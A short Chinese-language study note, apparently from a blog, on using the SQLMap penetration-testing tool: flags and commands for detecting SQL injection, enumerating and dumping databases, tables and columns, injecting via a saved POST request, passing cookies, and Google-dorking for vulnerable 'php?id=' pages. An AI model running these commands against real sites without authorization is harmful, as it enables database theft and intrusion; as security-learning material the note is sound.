【笔记】SQLMap学习笔记

发表于 更新于 阅读次数:

前言

sqlmap è un software open source per il penetration testing, che permette di automatizzare il rilevamento e lo sfruttamento di difetti nelle SQL injection e prendere così il controllo dei server DBMS.[1] Il software lavora a linea di comando.(维基百科

GET注入

<url>:包含注入点测试的URL

--batch:将交互式语句均回答是
--current-db:爆破当前数据库名

--dbs:爆破所有数据库名

-D <database_name>:指定数据库名
--tables:爆破所有数据表名

-T <table_name>:指定数据表名
--columns:爆破所有字段名

-C:指定字段名
--dump:爆破字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 检测注入点
sqlmap -u <url>

# 爆破所有数据库名
sqlmap -u <url> --dbs

# 爆破指定数据库的所有数据表名
sqlmap -u <url> --tables -D <database_name>

# 爆破指定数据表的所有字段名
sqlmap -u <url> --columns -D <database_name> -T <table_name>

# 爆破指定字段的所有数据
sqlmap -u <url> --dump -D <database_name> -T <table_name> -C <field_1>,<field_2>

POST注入

  • 从文件中读取HTTP请求
  • 在burp里将POST请求复制在文件中

<file>:POST请求

1
sqlmap -r <file>

利用google自动搜索注入点

1
sqlmap -g "php?id="

携带cookie

<cookie>:cookie信息

1
sqlmap -u <url> --cookie="<cookie>"

完成

参考文献

哔哩哔哩——千锋网络安